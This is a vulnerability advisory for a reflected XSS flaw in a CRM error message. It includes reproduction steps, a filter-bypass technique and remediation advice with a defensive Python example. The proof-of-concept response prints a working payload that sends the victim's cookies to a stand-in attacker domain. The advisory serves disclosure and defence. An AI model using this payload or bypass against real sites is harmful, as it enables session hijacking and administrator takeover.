Description
A registered user in the system can execute arbitrary JavaScript code and thus achieve a reflected Cross-site Scripting (XSS) attack. This can result, for example, in stealing targeted users' session cookies (including those of administrators) or redirecting them to download arbitrary files controlled by the attacker.
Steps to Reproduce
1. Log in to the system as a regular user.
2. Familiarize yourself with the HTTP requests and notice the error message returned from the "ESListViewController" action when an incorrect function name is supplied via the "function_name" parameter.
3. Notice that when HTML code is inserted into the "function_name" parameter value, several tags and events are escaped by the server, preventing the injection of arbitrary client-side code.
4. Observe that when inserting specific tags, such as or , in conjunction with double less-than signs (<<) at the end, the HTML code is rendered successfully.
5. Notice that some events, such as "onbeforeinput", are rendered as well, allowing the construction of a working XSS payload from arbitrary client-side code. The crafted payload steals the targeted user's session cookie as soon as the user opens the URL and presses any key.
6. The targeted user, who has the administrator role, opens the crafted URL and presses any key; the session cookie is sent to an attacker-controlled website automatically, without the administrator's knowledge.
7. The attacker gains complete access to the administrator account and performs further actions on the system, such as creating a new administrator account for persistent access and extracting sensitive information about the company.
Disclaimer
Although exploitation requires user interaction, attackers can easily induce it. The severe consequences (such as session hijacking) occur without the victim's knowledge, making this attack vector highly viable. For example, an attacker can create a convincing form that tricks the victim into entering arbitrary characters. Since the URL appears legitimate and only a single character or action is needed for a successful attack, it is highly likely to succeed.
Proof of Concept Request and Response
Response:
HTTP/1.1 200 OK
Date: Fri, 17 May 2024 10:16:35 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: ck_login_id_20=3b1edca5-cac6-e6d8-5fdb-663f40272a6d; expires=Thu, 15-Aug-2024 10:16:35 GMT; Max-Age=7776000; path=/; domain=192.168.146.150; HttpOnly
Set-Cookie: ck_login_language_20=en_us; expires=Thu, 15-Aug-2024 10:16:35 GMT; Max-Age=7776000; path=/; domain=192.168.146.150; HttpOnly
Set-Cookie: sugar_user_theme=SuiteP; expires=Sat, 17-May-2025 10:16:35 GMT; Max-Age=31536000; path=/; domain=192.168.146.150; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
X-Content-Encoding-Over-Network: gzip
Content-Length: 203
Class does not have function: ESListViewController-><div id="xss" contenteditable onbeforeinput="fetch('http://attacker-controlled-domain.test/?c='+document['cookie']);" autofocus>"<"<
PoC-alert.mp4
PoC-stealing-cookies.mp4
Impact
Gain complete access to the system with an administrator account or any other user of the attacker's choice.
Recommendations
Ensure that user-supplied values (here, the "function_name" parameter reflected into the error message) are HTML-encoded at the point of output rather than filtered against a deny-list of tags and events; encoding neutralizes any markup regardless of which tag or event is used.
Set the HttpOnly attribute on session cookies so that client-side scripts cannot read them via document.cookie. This does not stop XSS itself, but it removes cookie theft as a consequence. Note that the cookies in the response above already carry HttpOnly, so the cookie read by the payload must be one that lacks the flag; verify that every session-bearing cookie is covered.
Deploy a Content Security Policy (CSP) that defines approved sources for script loading and disallows inline event handlers, limiting what an injected payload can execute even if encoding is missed somewhere.
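The following is an added example illustrating the three recommendations above; it is not code from the affected product. It reflects a constructed value, shaped like the advisory's, into the error message two ways: through a toy deny-list filter (an assumption standing in for whatever the product does, showing why a fixed list of tags and events is insufficient) and through HTML encoding at the point of output. It also builds the CSP and cookie headers. The error-message prefix and parameter shape come from the advisory; the function names, the deny-list contents, the cookie name "session" and the event-handler placeholder are assumptions.

```python
"""Output encoding for a reflected parameter, shown beside a deny-list filter.

Added example, not code from the affected product.  The error-message prefix
and the shape of the reflected input follow the advisory; everything else is
an assumption made for illustration.
"""
import html
import re
from http.cookies import SimpleCookie

ERROR_PREFIX = "Class does not have function: ESListViewController->"

# Constructed sample input modelled on the advisory's reflected value; the
# event handler body is a placeholder comment, not a working script.
SAMPLE_INPUT = (
    '<div id="xss" contenteditable onbeforeinput="/*handler*/" autofocus>"<"<'
)

# Constructed deny-list filter (assumption): removes a fixed set of tags and
# a fixed set of event attributes, and lets everything else through.
_DENIED_TAGS = re.compile(r"</?(script|img|iframe|svg)\b[^>]*>", re.IGNORECASE)
_DENIED_EVENTS = re.compile(
    r"\bon(click|load|error|mouseover)\s*=\s*(\"[^\"]*\"|'[^']*'|\S+)",
    re.IGNORECASE,
)


def blacklist_filter(value: str) -> str:
    """Strip only the tags and events on the deny list; anything else passes."""
    return _DENIED_EVENTS.sub("", _DENIED_TAGS.sub("", value))


def render_error_unsafe(function_name: str) -> str:
    """Vulnerable pattern: filtered, but still inserted into HTML as raw markup."""
    return ERROR_PREFIX + blacklist_filter(function_name)


def render_error_safe(function_name: str) -> str:
    """Hardened pattern: HTML-encode the untrusted value at the point of output.

    html.escape with quote=True turns <, >, &, " and ' into entities, so the
    browser displays the text instead of parsing it as an element or attribute.
    """
    return ERROR_PREFIX + html.escape(function_name, quote=True)


def decoded_value(rendered: str) -> str:
    """Recover the original input from the encoded error text (round-trip check)."""
    return html.unescape(rendered[len(ERROR_PREFIX):])


def contains_raw_tag(fragment: str) -> bool:
    """Defender's check: does the fragment still contain an unencoded tag start?"""
    return re.search(r"<[A-Za-z/]", fragment) is not None


def security_headers(session_value: str = "placeholder-session-id") -> dict:
    """Response headers matching the other two recommendations.

    The CSP allows scripts only from the page's own origin and, having no
    'unsafe-inline', blocks inline event handlers; the session cookie carries
    HttpOnly so script cannot read it via document.cookie.  The cookie name
    'session' is an assumption.
    """
    jar = SimpleCookie()
    jar["session"] = session_value
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    jar["session"]["path"] = "/"
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": jar["session"].OutputString(),
    }


if __name__ == "__main__":
    print("deny-list only :", render_error_unsafe(SAMPLE_INPUT))
    print("encoded output :", render_error_safe(SAMPLE_INPUT))
    for name, value in security_headers().items():
        print(f"{name}: {value}")
```

Running the script shows the deny-list version passing the div and its onbeforeinput attribute through untouched, while the encoded version contains no `<` at all yet decodes back to the exact input, which is the property a fix should be tested for.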
References
https://cwe.mitre.org/data/definitions/79.html
https://portswigger.net/web-security/cross-site-scripting